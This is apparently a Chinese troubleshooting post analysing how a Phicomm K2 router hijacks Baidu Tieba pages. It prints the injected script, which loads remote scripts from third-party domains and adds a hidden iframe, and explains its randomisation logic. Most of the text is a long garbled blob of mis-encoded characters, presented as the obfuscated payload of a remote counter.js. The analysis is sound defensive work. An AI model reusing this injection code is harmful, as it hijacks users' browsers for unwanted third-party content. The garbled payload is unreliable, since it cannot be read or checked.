斐讯路由器劫持贴吧无法打开分析
k2路由器
软件版本号:22.6.534.263
解决办法
在hosts
文件中插入127.0.0.1 t.wsgblw.com
即可临时解决。
想长期解决建议更换路由器。
问题回顾
在贴吧代码插入一段script
<script async=true src="http://t.wsgblw.com:88/j1.js?MAC=XXXXXXXXXXXX"></script>
其中XXXXXXXXXXXX
为路由器MAC。返回一下内容:
function newjs(){
var star = document.createElement("script");
star.src = "http://junkucm.com/bd/query.js?vid=40000";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(star, s);
};
function old(){
var star = document.createElement("script");
star.src = "https://itbaguanan.com/counter.js?_sid=6000";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(star, s);
};
function abc() {
var wy = document.createElement("div");
wy.style = "display:none";
wy.innerHTML = "<iframe src=\"http://t.7gg.cc:88/new.html\" ></iframe>";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(wy, s);
};
function forbidHost(){
var host = top.window.location.host;
if ((host.indexOf(".7gg.cc") != -1)||(host.indexOf(".junkucm.com") != -1)||(host.indexOf(".wsgblw.com") != -1)){
return true;
}
}
aa();
function aa(){
if(forbidHost()){
return false;
}
var mbad=Math.ceil(Math.random()*100);
if (mbad<-1){
newjs();
abc();
}else{
old();
abc();
}
}
Math.random();
的作用是返回介于 0(包含) ~ 1(不包含) 之间的一个随机数:
所以他的100倍
肯定是大于0的
Math.ceil()
函数返回大于或等于一个给定数字的最小整数。所以mbad
的值是大于0,也就是大于-1.
所以会执行old()
请求到https://itbaguanan.com/counter.js?_sid=6000
该脚本内容为:
Function("鈥屸�嶁�屸�屸�岋豢鈥屸�嶁�屸�嶁�嬧�屸�屸�嶏豢鈥嬧�嬧�嶁�嶁�嬧�嬧�嶁�岋豢鈥嬧�嶁�嶁�嬧�屸�嶏豢锘库�嬶豢锘库�屸�屸�嶁�屸�嬧�屸�嶏豢锘库�屸�嶁�嬶豢鈥岋豢鈥屸�屸�屸�嶏豢鈥屸�屸�嶁�屸�屸�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�嬧�嶏豢鈥嶁�屸�嶁�嬶豢鈥岋豢鈥嬧�嶁�屸�嶁�屸�屸�屸�嶁�嬧�屸�岋豢鈥屸�嬧�屸�嶁�屸�屸�屸�嬧�屸�屸�屸�嶏豢鈥嬧�屸�嶁�屸�屸�屸�嶏豢鈥屸�屸�嶁�屸�屸�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�嬧�嶁�嶁�嬧�嬧�嶁�嬧�嶁�岋豢鈥嬶豢鈥屸�嶁�嬶豢鈥岋豢鈥嬧�嶁�屸�嶁�嶁�屸�岋豢鈥嬧�嬧�岋豢鈥屸�嬧�嬧�嶁�嬧�嶁�嬧�嶁�嶁�屸�嬧�嶁�嶁�屸�嬧�嶏豢鈥嶁�岋豢鈥嬶豢鈥岋豢鈥嬧�嶁�屸�嶁�嬶豢鈥嬶豢锘库�屸�嬧�嶁�嬧�嶁�屸�嶁�嶁�嬧�岋豢鈥屸�嬧�岋豢鈥屸�嬧�岋豢鈥嬧�嬧�岋豢鈥嬶豢鈥嬶豢鈥嶁�嶁�嬧�嶏豢锘库�嬧�嶏豢锘库�屸�嶁�嶁�屸�岋豢鈥屸�嬧�屸�嶁�嬧�嶁�屸�嶁�嬧�屸�屸�嶁�岋豢鈥岋豢鈥屸�屸�屸�嶁�嬧�屸�屸�嶏豢鈥嶁�屸�嶁�嬧�屸�屸�嶏豢鈥嶁�嬧�嶏豢鈥嶁�屸�嶁�嬶豢鈥屸�嶏豢锘库�屸�嶏豢鈥屸�嬧�嶏豢锘库�岋豢鈥屸�嬧�屸�嶏豢锘库�屸�嶏豢鈥嶁�屸�嶁�岋豢鈥屸�嶁�嶁�嶁�屸�嶁�嶁�屸�嬧�嶏豢鈥嶁�屸�嶁�嶁�嶁�岋豢鈥嬶豢鈥嬧�嶁�嬧�嶁�嬶豢鈥嶏豢鈥岋豢鈥屸�嶁�屸�嶁�嬧�屸�岋豢鈥嬧�嶁�嬧�嶁�嬧�嬧�屸�嶁�屸�屸�嬧�嶏豢鈥嬧�屸�嶏豢鈥嶁�嬶豢锘库�屸�屸�嶁�屸�嬧�屸�嶏豢锘库�屸�嶁�嬶豢鈥岋豢鈥屸�屸�屸�嶏豢鈥屸�屸�嶁�屸�屸�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�嬧�嶏豢鈥嶁�屸�嶁�岋豢鈥屸�嶁�屸�屸�岋豢鈥屸�嬧�屸�嬧�屸�屸�屸�嶏豢鈥嬧�屸�嶁�屸�屸�屸�嶏豢鈥屸�屸�嶁�屸�屸�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�岋豢鈥嬶豢鈥屸�嬧�嬧�嶁�岋豢鈥嶁�屸�屸�屸�屸�嬧�屸�嶁�嬧�屸�屸�嶁�岋豢鈥屸�嬶豢鈥嶁�屸�嶁�嬧�屸�屸�嶏豢鈥屸�屸�嶁�屸�屸�嬧�嶁�嶁�嬧�嬧�嶁�嬧�嶁�岋豢鈥嬶豢鈥屸�嶁�嬶豢鈥岋豢鈥嬧�嶁�屸�嶁�嶁�屸�岋豢鈥嬧�嬧�岋豢鈥屸�嬧�嬧�嶁�嬧�嶁�嬧�嶁�嶁�屸�屸�屸�嶏豢鈥嬶豢鈥嬧�嬧�屸�岋豢鈥屸�嬶豢鈥嶏豢鈥屸�嶁�嶁�屸�屸�嶁�屸�嶁�嬧�嶁�嶁�嬧�屸�嶏豢鈥嶁�嬧�嶏豢鈥嶁�岋豢鈥嬧�嬧�屸�嶁�嬧�屸�岋豢鈥嬧�嶁�屸�嶁�屸�屸�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�屸�嬶豢鈥嶁�屸�嶏豢锘库�屸�嶁�屸�嬧�屸�嶁�屸�屸�嬧�嶏豢鈥嶁�屸�嶁�嶁�屸�屸�嶏豢鈥嶁�岋豢鈥嬶豢鈥屸�嶁�屸�屸�岋豢鈥嬧�嶁�岋豢鈥屸�嬧�屸�嬧�嬧�嶁�屸�嶁�屸�屸�屸�嶁�屸�嶁�屸�嶏豢锘库�岋豢鈥嬧�嶁�屸�嶁�屸�屸�嬧�嶁�嶁�嬧�屸�嶏豢锘库�嬧�嶏豢鈥嬧�屸�嶏豢鈥嶁�嬧�嶁�嶁�屸�嬧�嶏豢鈥嬧�岋豢鈥岋豢鈥屸�嶁�嶁�屸�屸�嶏豢鈥嶁�屸�嶁�屸�嬧�屸�嶏豢锘库�岋豢鈥岋豢鈥嬧�嶏豢鈥嶁�屸�屸�嶁�嬧�屸�嬶豢鈥屸�屸�嬶豢鈥嬧�屸�嬧�嶁�嬧�岋豢鈥屸�嬧�岋豢鈥屸�嬧�岋豢鈥嬧�嬧�屸�屸�嬧�嶁�屸�嶁�屸�屸�岋豢鈥嬧�屸�岋豢鈥屸�屸�屸�嶁�屸�屸�岋豢鈥嬶豢鈥岋豢鈥屸�嬧�嬧�嶁�嶁�屸�嬧�嶁�嶁�嬧�屸�嶁�屸�屸�嬶豢锘库�屸�屸�嶏豢鈥嶁�屸�嶁�屸�屸�岋豢鈥岋豢鈥嬧�嶁�嬧�嬧�屸�屸�嶁�嬧�屸�嬶豢鈥屸�屸�嬶豢鈥嬧�屸�嬧�嶁�嬧�岋豢鈥屸�嬧�岋豢鈥屸�嬧�岋豢鈥嬧�嬧�屸�屸�嬧�嶁�屸�嶁�屸�屸�岋豢鈥嬧�屸�岋豢鈥屸�屸�屸�嶁�屸�屸�岋豢鈥嬶豢鈥岋豢鈥屸�嬧�嬧�嶁�嶁�屸�嬧�嶏豢鈥嶁�屸�嶏豢锘库�嬧�嶁�屸�嶁�嬧�嶁�屸�嶁�屸�嶁�屸�屸�嬧�嶏豢鈥嶁�屸�嶏豢锘库�嬧�嶁�嶁�嬧�嬧�嶁�嬧�嶁�岋豢鈥屸�嬧�屸�嶁�屸�屸�岋豢鈥嶁�嬧�岋豢鈥屸�嬧�嬧�嶏豢锘库�岋豢鈥嶁�嬧�屸�嶏豢鈥屸�屸�嶏豢鈥嬧�嬧�嶁�嬧�嶁�嬧�嶁�嶁�屸�嬶豢鈥嶏豢鈥屸�嶁�屸�屸�屸�嶏豢鈥嬧�岋豢鈥嬶豢鈥屸�嶁�屸�屸�嬧�嶁�嬧�嬧�屸�嶁�嶁�屸�屸�嶁�屸�嶁�嬧�嶁�嶁�嬧�岋豢鈥岋豢鈥屸�嶁�嶁�屸�屸�嶏豢鈥嶁�屸�嶁�屸�嬧�屸�嶏豢锘库�岋豢鈥岋豢鈥嬧�嶏豢鈥嶁�岋豢鈥屸�嬧�嬧�嶁�嶁�屸�屸�嶁�屸�嶁�屸�嶏豢锘库�岋豢鈥嬧�嶁�嬧�嶁�嶁�嬧�岋豢鈥屸�嶁�屸�嶁�嬧�屸�岋豢鈥嬧�嶁�嬧�嶁�嬧�嬧�屸�嶏豢锘库�嬶豢锘库�屸�屸�屸�嶏豢鈥嬧�嶁�嬧�嶁�屸�嬶豢鈥屸�屸�屸�嬶豢鈥屸�屸�嶁�嬧�屸�嬶豢鈥屸�屸�嬶豢鈥嬧�嬶豢鈥嬧�嶁�嬧�嶏豢鈥嶁�屸�屸�嶁�嬧�屸�嬶豢鈥屸�屸�嬶豢鈥嬧�屸�嬧�嶁�嬧�屸�屸�屸�嬧�屸�屸�屸�嬧�屸�屸�嬧�嬧�嬧�嶁�嬧�嶁�嬧�嶏豢鈥嬧�嬧�嶁�嬧�嶁�屸�嬶豢鈥屸�屸�嶁�嶁�屸�岋豢鈥嬶豢鈥屸�嶁�嬶豢鈥岋豢鈥嬧�嶁�屸�嶏豢锘库�岋豢鈥嬶豢鈥屸�嶏豢锘库�屸�嶁�屸�嶁�岋豢鈥屸�嬧�嬧�嶏豢鈥嶁�屸�屸�嶁�嬧�屸�嬶豢鈥屸�屸�嬶豢鈥嬧�屸�嬧�嶁�嬧�屸�屸�屸�嬧�屸�屸�屸�嬧�屸�屸�嬧�嬧�嬧�嶁�嬧�嶁�屸�岋豢鈥屸�嬧�嶏豢鈥嬧�岋豢鈥屸�嬧�嬶豢锘库�屸�嬶豢鈥嬧�嬧�嬶豢鈥嶏豢鈥岋豢鈥屸�嬧�嬶豢锘库�嬧�屸�嶏豢锘库�嬧�嶏豢鈥嶁�屸�嶏豢鈥嬧�屸�嶁�屸�屸�屸�嶏豢鈥嶁�屸�嶁�岋豢鈥岋豢鈥屸�嬧�屸�嶁�嶁�嬧�嬶豢鈥嶏豢鈥岋豢鈥屸�嬧�嬧�嶁�嶏豢鈥嬧�嶁�嶏豢鈥嬧�嶁�嶁�屸�岋豢鈥屸�嬧�岋豢鈥嬧�嶁�岋豢鈥嶁�屸�岋豢鈥嶏豢鈥屸�嶁�屸�屸�嬶豢锘库�屸�屸�嶏豢鈥嶁�屸�嶁�屸�屸�岋豢鈥岋豢鈥嬧�嶁�嬧�嬧�屸�嬧�嬧�屸�屸�嶁�嬶豢鈥岋豢鈥屸�嬧�屸�嶁�嶁�屸�岋豢鈥屸�嶁�屸�嶁�屸�屸�屸�屸�嶁�嬧�屸�嬶豢锘库�屸�嶁�嬧�嶁�屸�嶁�嶁�嶁�屸�嶁�屸�屸�屸�嶁�嬶豢鈥岋豢鈥屸�嬧�嬧�嶁�嶁�嬧�屸�嶏豢锘库�屸�屸�嶏豢鈥岋豢鈥屸�嬧�屸�岋豢鈥屸�嬧�嶁�嶁�屸�岋豢锘库�屸�屸�嶁�嬶豢鈥屸�嶁�嬧�屸�岋豢鈥屸�嬧�屸�嶁�嬶豢鈥屸�嶁�嶁�嬧�嬧�嶁�嶁�嬧�屸�嶁�屸�屸�嬧�嶁�嶁�屸�岋豢鈥嶏豢鈥岋豢锘库�屸�屸�嶁�屸�屸�嬧�嶏豢鈥嶁�屸�嶏豢锘库�岋豢鈥嬧�嬧�屸�嶁�屸�屸�屸�嶏豢鈥嶁�嬧�嶁�嶁�嬧�嬧�嶁�嬧�嶁�屸�屸�嬧�嬧�屸�嬶豢锘库�屸�屸�嬶豢鈥屸�屸�屸�嬧�嬧�嶁�嬧�嶁�嬧�嶏豢鈥嬧�嬧�嶁�嬧�嶁�屸�嶁�嶁�嬧�岋豢鈥屸�嬧�岋豢鈥屸�嬧�岋豢鈥嬧�嬧�岋豢鈥嬶豢鈥嬶豢鈥嶁�嶁�嬧�嶏豢锘库�嬧�嶏豢锘库�屸�嶁�嶁�屸�岋豢鈥屸�嬧�屸�嶁�嬧�嶁�屸�嶁�嬧�屸�屸�嶁�岋豢鈥岋豢鈥屸�屸�屸�嶁�嬧�屸�屸�嶏豢鈥嶁�屸�嶁�嬧�屸�屸�嶏豢鈥嶁�嬧�嶏豢鈥嶁�屸�嶁�嬶豢鈥屸�嶏豢锘库�屸�嶏豢鈥屸�嬧�嶏豢锘库�屸�嶏豢鈥嬧�屸�嶏豢锘库�屸�嶁�岋豢鈥屸�嶁�岋豢鈥屸�嶁�屸�屸�岋豢鈥嬧�嶁�嬧�嶏豢鈥嶁�岋豢鈥嬧�嬧�屸�嶁�嶁�嬧�岋豢鈥嬧�嬧�嬧�嶁�嬧�嶁�嬧�嶁�嶁�屸�嬧�嶏豢鈥嬧�屸�嶁�屸�屸�嬧�嶏豢鈥嶁�岋豢鈥嬶豢鈥屸�嶁�屸�屸�岋豢鈥屸�嬧�屸�屸�嬧�嶁�屸�嶁�屸�屸�岋豢鈥嬧�屸�岋豢鈥屸�屸�屸�嶁�屸�屸�岋豢鈥嬶豢鈥岋豢鈥屸�嬧�屸�嬧�嶁�嬧�屸�嶁�屸�屸�屸�嶁�嬧�屸�屸�嶁�屸�嬧�屸�嶁�屸�屸�岋豢鈥嬧�嶁�嬧�嶁�嶁�嬧�嬧�嶁�嬧�嶁�屸�嬧�嬶豢鈥屸�嶏豢锘库�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�屸�嶁�屸�屸�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�嬧�嶏豢鈥屸�岋豢鈥屸�嬧�岋豢鈥嶁�屸�岋豢鈥嬧�嬧�屸�嶁�屸�屸�嬧�嶁�嬧�嶁�嬧�嶏豢鈥嬧�嬧�嶁�嬧�嶁�屸�嶁�嬧�屸�岋豢鈥嬧�嬧�岋豢鈥嬧�嬧�屸�嶏豢鈥嬧�屸�嶁�嶁�屸�屸�嶁�嬶豢鈥屸�嶁�嬧�屸�岋豢鈥屸�嬧�屸�嶁�嶁�屸�屸�嶏豢锘库�屸�嶏豢鈥嶁�嬧�嶏豢锘库�岋豢鈥嶁�嬧�嬧�嶏豢鈥屸�岋豢鈥岋豢鈥岋豢鈥岋豢鈥岋豢鈥岋豢鈥嬧�嶏豢鈥屸�屸�嶁�屸�嶁�屸�嶏豢锘库�岋豢鈥嬧�嶁�屸�嶏豢鈥屸�嬧�嶏豢鈥屸�岋豢鈥屸�屸�岋豢鈥嬧�嶁�屸�嶏豢鈥嬧�屸�嶁�屸�屸�屸�嶏豢鈥嶁�屸�嶁�嬶豢鈥屸�嶏豢锘库�屸�嶁�屸�嬧�屸�嶁�屸�屸�屸�嶁�屸�嬧�嬧�嶁�嬧�嶁�嬧�嶁�嶁�屸�嬧�嶏豢鈥嬧�屸�嶁�屸�屸�嬧�嶏豢鈥嶁�屸�嶏豢锘库�屸�嶏豢鈥嶁�岋豢鈥嬧�嶁�屸�嶁�屸�屸�屸�嶁�嬧�屸�屸�嶁�屸�嬧�岋豢鈥嶁�屸�岋豢鈥嬶豢鈥岋豢鈥屸�嬧�屸�嶁�嬧�屸�岋豢鈥屸�嬧�屸�嶁�屸�屸�屸�嶁�嬶豢鈥屸�嶁�嶁�嬧�屸�嶁�嬧�屸�屸�嶏豢鈥嶁�屸�嶁�岋豢鈥屸�嶁�屸�屸�嬶豢锘库�屸�屸�嶁�屸�嶁�岋豢鈥屸�屸�屸�嶏豢鈥嶁�屸�嶁�嬶豢鈥岋豢鈥屸�嬧�屸�嶁�嶁�屸�屸�嶏豢锘库�屸�嶏豢鈥嶁�嬧�嶁�嶁�嬧�嬧�嶁�嶁�屸�岋豢鈥嶏豢鈥屸�嶁�嶁�屸�屸�嶁�屸�嶁�嬧�嶁�嶁�嬧�嬶豢鈥屸�嬧�嬶豢锘库�屸�嬶豢锘库�屸�屸�嶁�屸�屸�嬧�嶏豢鈥嶁�岋豢鈥嬧�嶁�屸�嶁�屸�屸�屸�嶁�嬧�屸�屸�嶁�屸�嬧�岋豢鈥嶁�屸�屸�屸�嬶豢鈥岋豢鈥屸�嬧�屸�嶁�嬧�屸�岋豢鈥屸�嬧�屸�嶁�屸�屸�嬧�嶁�屸�嶁�嬧�嶁�屸�嶁�嬶豢鈥嬧�嶁�嬶豢鈥嬧�嬧�嬶豢鈥嬧�嬧�嬶豢锘库�屸�嬶豢锘库�屸�屸�嶁�屸�屸�嬧�嶏豢鈥嶁�岋豢鈥嬶豢鈥岋豢鈥屸�嬧�屸�嶁�嬧�屸�岋豢鈥屸�嬧�岋豢鈥屸�屸�岋豢鈥嬶豢鈥嬧�嶁�屸�嶁�嬧�嶁�屸�嶁�嬧�嶁�嬧�嶁�嬧�嶁�嬧�嶁�嬧�嶁�嬧�屸�嬶豢锘库�屸�屸�嶁�屸�屸�嬧�嶏豢鈥嶁�岋豢鈥嬧�嶁�屸�嶁�屸�屸�岋豢鈥嬶豢鈥岋豢鈥嬧�嬧�屸�嶏豢锘库�屸�嶏豢鈥嶁�岋豢鈥嬶豢鈥屸�嶁�屸�屸�屸�屸�屸�嬧�屸�嶁�屸�屸�岋豢鈥嶁�嬧�岋豢鈥屸�嬧�嬧�嶁�嶁�屸�岋豢鈥屸�嬧�岋豢鈥嬧�嶁�岋豢鈥嶁�屸�岋豢鈥嶏豢鈥岋豢鈥屸�嶁�屸�嶁�嬧�屸�岋豢鈥嬧�嶁�嬧�嶁�嬧�嬧�岋豢鈥屸�嬧�嬧�嶏豢鈥嬧�屸�嶏豢锘库�嬧�嶏豢鈥嬧�屸�嶏豢鈥嶁�嬶豢锘库�屸�屸�嶁�屸�屸�嬧�嶏豢鈥嶁�岋豢鈥嬧�嶁�屸�嶁�屸�屸�岋豢鈥嬶豢鈥岋豢鈥嬧�嬧�屸�嶏豢锘库�屸�嶏豢鈥嶁�岋豢鈥嬶豢鈥屸�嶁�屸�屸�屸�屸�屸�嬧�屸�嶁�屸�屸�岋豢鈥嶁�嬧�岋豢鈥屸�嬧�嬧�嶏豢鈥嶁�岋豢鈥嬶豢鈥岋豢鈥嬧�嬧�屸�嶏豢鈥嬧�屸�嶁�嶁�屸�岋豢鈥屸�嬧�嬧�嶁�嶁�嬧�嬧�嶁�嬧�嶁�嬶豢鈥嶏豢鈥嬧�嶁�嬧�嶁�嬧�嶁�嶁�屸�嬶豢鈥嶏豢鈥屸�嶁�嶁�屸�屸�嶁�屸�嶁�嬧�嶁�嶁�嬧�嬧�嶁�嬧�嶁�嬧�嶁�嬧�嶁�嬧�嶁�嬧�屸�嬶豢锘库�屸�屸�嶏豢鈥嶁�屸�屸�嶏豢鈥嬶豢鈥嬧�嶁�屸�岋豢鈥屸�嬧�嶁�屸�嶁�嬧�嶁�屸�嶁�岋豢鈥屸�嶁�屸�嶏豢锘库�屸�嶁�嶁�屸�屸�嶁�屸�嬧�嬧�嶁�嬧�嬧�嬶豢鈥嬧�嬧�嬧�嶁�嬧�屸�嬶豢锘库�屸�嬶豢锘库�屸�屸�嶏豢鈥嶁�屸�屸�嶏豢鈥嬶豢鈥嬧�嶁�屸�岋豢鈥屸�嬧�嶁�嶁�屸�嬧�嶁�嶁�嬧�岋豢鈥屸�嬧�嬶豢锘库�屸�屸�嶁�屸�嬧�屸�嶏豢锘库�屸�嶁�嬶豢鈥岋豢鈥屸�屸�屸�嶏豢鈥屸�屸�嶁�屸�屸�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�嬧�嶏豢鈥嶁�屸�嶁�嬶豢鈥岋豢鈥嬧�嶁�屸�嶁�屸�屸�屸�嶁�嬧�屸�岋豢鈥屸�嬧�屸�嶁�屸�屸�屸�嬧�屸�屸�屸�嶏豢鈥嬧�屸�嶁�屸�屸�屸�嶏豢鈥屸�屸�嶁�屸�屸�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�嬧�嶁�嶁�嬧�嬧�嶁�嬧�嶁�岋豢鈥嬶豢鈥屸�嶁�嬶豢鈥岋豢鈥嬧�嶁�屸�嶁�嶁�屸�岋豢鈥嬧�嬧�岋豢鈥屸�嬧�嬧�嶁�嬧�嶁�嬧�嶁�嶁�屸�嬧�嶁�嶁�屸�嬧�嶏豢鈥嶁�岋豢鈥嬶豢鈥岋豢鈥嬧�嶁�屸�嶁�嬶豢鈥嬶豢锘库�屸�嬧�嶁�嬧�嶁�屸�嶁�嶁�嬧�岋豢鈥屸�嬧�岋豢鈥屸�嬧�岋豢鈥嬧�嬧�岋豢鈥嬶豢鈥嬶豢鈥嶁�嶁�嬧�嶏豢锘库�嬧�嶏豢锘库�屸�嶁�岋豢鈥屸�嶏豢锘库�嬧�嶏豢鈥嶁�岋豢鈥岋豢鈥屸�嶁�嬧�屸�岋豢鈥岋豢鈥屸�嶁�嬧�屸�屸�嶁�屸�嬧�岋豢鈥嬧�嶁�嬧�嶏豢鈥嶁�屸�嶁�嬶豢鈥屸�嶏豢锘库�屸�嶏豢鈥屸�嬧�嶏豢锘库�岋豢鈥屸�嬧�屸�嶁�嶁�嶁�嬧�嶏豢鈥嶁�屸�嶁�嶁�嶁�岋豢鈥嬶豢鈥嬧�嶁�嬧�嶁�嬧�嶏豢鈥嬧�嬧�嶁�嶁�嬧�屸�嶏豢锘库�嬶豢锘库�屸�屸�嶁�屸�嬧�屸�嶏豢锘库�屸�嶁�嬶豢鈥岋豢鈥屸�屸�屸�嶏豢鈥屸�屸�嶁�屸�屸�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�嬧�嶏豢鈥嶁�屸�嶁�岋豢鈥屸�嶁�屸�屸�岋豢鈥屸�嬧�屸�嬧�屸�屸�屸�嶏豢鈥嬧�屸�嶁�屸�屸�屸�嶏豢鈥屸�屸�嶁�屸�屸�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�岋豢鈥嬶豢鈥屸�嬧�嬧�嶁�岋豢鈥嶁�屸�屸�屸�屸�嬧�屸�嶁�嬧�屸�屸�嶁�岋豢鈥屸�嬶豢鈥嶁�屸�嶁�嬧�屸�屸�嶏豢鈥屸�屸�嶁�屸�屸�嬧�嶁�嶁�嬧�嬧�嶁�嬧�嶁�岋豢鈥嬶豢鈥屸�嶁�嬶豢鈥岋豢鈥嬧�嶁�屸�嶁�嶁�屸�岋豢鈥嬧�嬧�岋豢鈥屸�嬧�嬧�嶁�嬧�嶁�嬧�嶁�嶁�屸�屸�屸�嶏豢鈥嬶豢鈥嬧�嬧�屸�岋豢鈥屸�嬧�嶁�嶁�屸�嬧�嶏豢鈥嶁�岋豢鈥嬧�嬧�屸�嶁�嬧�屸�岋豢鈥嬧�嶁�屸�嶁�屸�屸�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�屸�嬶豢鈥嶁�屸�嶏豢锘库�屸�嶁�屸�嬧�屸�嶁�屸�屸�嬧�嶏豢鈥嶁�屸�嶁�嶁�屸�屸�嶏豢鈥嶁�岋豢鈥嬶豢鈥屸�嶁�屸�屸�岋豢鈥嬧�嶁�岋豢鈥屸�嬧�屸�嬧�嬧�嶁�屸�嶁�屸�屸�屸�嶁�屸�嶁�屸�嶏豢锘库�岋豢鈥嬧�嶁�屸�嶁�屸�屸�嬧�嶁�嶁�嬧�岋豢鈥屸�嬧�嬧�嶏豢鈥嬧�屸�嶏豢锘库�嬧�嶁�嶁�屸�嬶豢鈥嶏豢鈥屸�嶁�嶁�屸�屸�嶁�屸�嶁�嬧�嶁�嶁�嬧�嬧�嶁�嬧�嶁�嬧�嶁�嬧�嶁�嬧�嶁�嬧�屸�嬶豢锘库�屸�屸�嶏豢鈥嶁�屸�屸�嶏豢鈥嬶豢鈥嬧�嬧�屸�岋豢鈥屸�嬧�嶁�屸�嶁�嬧�嶁�屸�嶁�岋豢鈥岋豢鈥屸�嶁�嶁�屸�屸�嶏豢鈥嶁�屸�嶁�屸�嬧�屸�嶏豢锘库�岋豢鈥岋豢鈥嬧�嶏豢鈥嶁�屸�嶏豢鈥嬧�屸�嶏豢锘库�屸�嶁�嬶豢鈥屸�嶁�嬧�屸�岋豢鈥屸�嬧�屸�嶁�嶁�屸�屸�嶏豢锘库�屸�嶏豢鈥嶁�嬧�嶏豢鈥嶁�岋豢鈥嬧�嶁�屸�嶁�屸�屸�岋豢鈥嬧�嬧�屸�嶏豢鈥嬧�屸�嶁�嬧�屸�屸�嶁�嬶豢鈥屸�嶁�屸�屸�嬧�嶁�嶁�嬧�屸�嶁�屸�屸�屸�嶏豢鈥嶁�屸�嶁�嬶豢鈥屸�嶏豢锘库�屸�嶁�屸�嬧�屸�嶁�屸�屸�屸�屸�屸�屸�屸�屸�嬧�嶁�屸�嬧�嶁�屸�嬧�嶁�嶁�嬧�屸�嶏豢鈥嶁�屸�屸�嶏豢鈥嬶豢鈥嬧�嬧�屸�岋豢鈥屸�嬧�嶁�嶁�屸�嬧�嶁�嶁�屸�嬧�嶏豢鈥嬧�嬧�嶁�嬧�嶁�嬧�嶁�嬧�嶁�嬧�嶁�嬧�屸�嬶豢锘库�屸�屸�嶏豢鈥嶁�屸�屸�嶏豢鈥嬶豢鈥嬧�屸�屸�岋豢鈥屸�嬧�嶁�嶁�屸�屸�嶁�嶁�屸�屸�嶁�屸�嶁�嬧�嶁�嶁�嬧�嬶豢鈥屸�屸�嬶豢锘库�嬧�屸�嬶豢鈥屸�屸�嶁�嬧�屸�岋豢鈥屸�嬧�屸�嶁�嶁�嬧�嬧�嶏豢鈥嶁�屸�嶁�屸�嶁�屸�嶏豢鈥嬧�屸�嶏豢锘库�屸�嶏豢锘库�岋豢鈥嬧�嶁�嬧�嶁�嶁�嬧�嬶豢鈥嬧�屸�嬶豢鈥嬧�嬧�嬶豢鈥嬧�嬧�嬧�嶁�嶁�嶁�屸�嬶豢鈥屸�屸�嶁�嬧�屸�岋豢鈥屸�嬧�屸�嶁�嶁�嬧�嬧�嶏豢鈥嶁�岋豢鈥嬧�嶁�屸�嶁�嬧�屸�屸�嶏豢鈥嶁�屸�嶁�屸�嬧�屸�嶏豢锘库�屸�嶏豢鈥屸�嬧�嶁�嶁�嬧�嬧�嶁�嶁�屸�嬧�嶁�嶁�屸�嬧�嶁�嶏豢鈥嬶豢鈥嬧�屸�嬧�嶁�屸�嶁�嬧�嶁�屸�嶁�屸�嶏豢鈥嶁�岋豢鈥屸�屸�屸�嶏豢鈥嬧�屸�嶏豢鈥嬧�嬶豢锘库�屸�嬶豢锘库�屸�屸�嶏豢鈥嶁�屸�嶁�嬧�屸�岋豢鈥屸�嶁�屸�嶁�嶁�屸�屸�嶁�岋豢鈥屸�嶁�嬧�屸�岋豢鈥屸�嬧�屸�嶏豢锘库�岋豢鈥嬧�嶁�嬧�嶏豢鈥嶁�岋豢鈥屸�屸�岋豢鈥嬶豢鈥屸�嶁�屸�屸�岋豢鈥嬧�嶁�屸�嬧�嬧�屸�屸�嶁�岋豢鈥屸�嶁�屸�屸�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�嬧�嶏豢鈥嶁�屸�嶏豢鈥屸�屸�嶁�嬧�屸�岋豢鈥屸�嬧�屸�嶁�嬶豢鈥屸�嶁�嶁�嬧�嬧�嶁�嶁�嬧�嬧�嶏豢锘库�嬧�嶁�嶁�嬧�屸�嶁�嶁�屸�屸�屸�嬧�嬧�屸�嶁�嶁�嬧�屸�嶏豢锘库�屸�嶏豢鈥嶁�屸�嶁�屸�屸�岋豢锘库�嬧�屸�嶁�嶁�屸�屸�屸�嬧�嬧�屸�嶏豢锘库�屸�嶁�屸�嬧�岋豢锘库�嬧�屸�嶁�嶁�屸�屸�嶏豢锘库�岋豢鈥嬶豢鈥岋豢锘库�嬧�屸�嶁�嶁�屸�屸�屸�嬧�嬧�屸�嶁�嬧�屸�屸�嶁�屸�嬧�嬧�嶁�嶁�屸�嬧�嶏豢锘库�屸�嶁�嶁�屸�嬧�嶁�嶁�屸�嬧�嶁�嶁�屸�嬧�嶁�嶁�嬧�岋豢鈥屸�嬧�嬶豢锘库�屸�屸�嶁�屸�嬧�屸�嶏豢锘库�屸�嶁�嬶豢鈥岋豢鈥屸�屸�屸�嶏豢鈥屸�屸�嶁�屸�屸�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�嬧�嶏豢鈥嶁�屸�嶁�嬶豢鈥岋豢鈥嬧�嶁�屸�嶁�屸�屸�屸�嶁�嬧�屸�岋豢鈥屸�嬧�屸�嶁�屸�屸�屸�嬧�屸�屸�屸�嶏豢鈥嬧�屸�嶁�屸�屸�屸�嶏豢鈥屸�屸�嶁�屸�屸�屸�嶏豢鈥嶁�岋豢鈥屸�嬧�嬧�嶁�嶁�嬧�嬧�嶁�嬧�嶁�岋豢鈥嬶豢鈥屸�嶁�嬶豢鈥岋豢鈥嬧�嶁�屸�嶁�嶁�屸�岋豢鈥嬧�嬧�岋豢鈥屸�嬧�嬧�嶁�嬧�嶁�嬧�嶁�嶁�屸�嬧�嶁�嶁�屸�嬧�嶏豢鈥嶁�岋豢鈥嬶豢鈥岋豢鈥嬧�嶁�屸�嶁�嬶豢鈥嬶豢锘库�屸�嬧�嶁�嬧�嶁�屸�嶁�嶁�嬧�岋豢鈥屸�嬧�岋豢鈥屸�嬧�岋豢鈥嬧�嬧�岋豢鈥嬶豢鈥嬶豢鈥嶁�嶁�嬧�嶏豢锘库�嬧�嶏豢锘库�屸�嶁�嶏豢鈥岋豢鈥